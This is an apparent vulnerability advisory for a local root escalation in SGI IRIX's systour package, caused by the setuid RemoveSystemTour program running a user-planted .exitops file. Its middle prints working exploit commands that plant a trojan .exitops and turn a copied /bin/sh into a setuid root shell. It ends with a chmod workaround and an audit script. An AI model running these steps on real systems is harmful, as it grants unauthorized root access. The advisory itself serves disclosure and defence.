[Original] Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 allows local users to gain root privileges via a Trojan horse .exitops program, which is called by the inst command that is executed by the RemoveSystemTour program.
[CNNVD] IRIX SGI system tour package (systour) Indigo Magic System Tour permissions and access control vulnerability (CNNVD-199610-009)
A vulnerability exists in Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3. Local users can gain root privileges via a Trojan horse .exitops program, which is run at the request of the inst command executed by the RemoveSystemTour program.
A vulnerability exists in both the Systour and OutOfBox subsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:
# /bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions
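
A way to confirm the workaround took effect and to spot leftover .exitops files, as an added example that is not part of the original advisory. The two binary paths come from the text above; the optional root prefix and the home-root argument are assumptions added so the check can also run against a mounted image or a test tree.

```shell
#!/bin/sh
# Added example: audit the chmod u-s workaround and list var/inst/.exitops
# files under user home directories. Function names are hypothetical.

# Paths named in the workaround above.
TOUR_BINARIES="/usr/lib/tour/bin/RemoveSystemTour /usr/people/tour/oob/bin/oobversions"

# Print "setuid", "clean" or "missing" for one path.
setuid_state() {
    if [ ! -f "$1" ]; then
        echo missing
    elif [ -n "$(find "$1" -prune -perm -4000 -print 2>/dev/null)" ]; then
        echo setuid
    else
        echo clean
    fi
}

# Report each binary; return non-zero if any still carries the setuid bit.
# $1 is an optional root prefix (assumption), empty for the live system.
audit_tour_binaries() {
    prefix=${1:-}
    rc=0
    for bin in $TOUR_BINARIES; do
        state=$(setuid_state "$prefix$bin")
        echo "$state $prefix$bin"
        [ "$state" = setuid ] && rc=1
    done
    return $rc
}

# List <home>/var/inst/.exitops for every directory directly under the
# given home root ($1, an assumption; pass wherever home directories live).
# The session above plants its file at exactly this relative path.
find_exitops() {
    for f in "$1"/*/var/inst/.exitops; do
        [ -f "$f" ] && echo "$f"
    done
    return 0
}
```

Run `audit_tour_binaries` as root after applying the workaround; a non-zero exit status means at least one of the two binaries is still setuid.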